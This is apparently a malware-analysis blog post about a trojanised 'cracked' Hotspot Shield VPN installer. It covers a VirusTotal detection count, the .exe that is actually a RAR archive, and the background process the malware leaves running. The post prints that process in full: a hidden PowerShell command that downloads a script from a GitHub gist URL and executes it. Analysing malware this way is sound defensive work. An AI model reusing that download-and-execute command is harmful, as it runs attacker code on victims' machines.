Alex Anghelus - Cyber Security Analyst: Malware research/reverse

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.

It is noticed that it is the latest file created.
Also, the installation method requires using this file.

OK.Let’s scan this time!
Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.

OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.

Let’s get started
It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!

When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

The virus runs through the application Powershell.exe, being connected to external sources.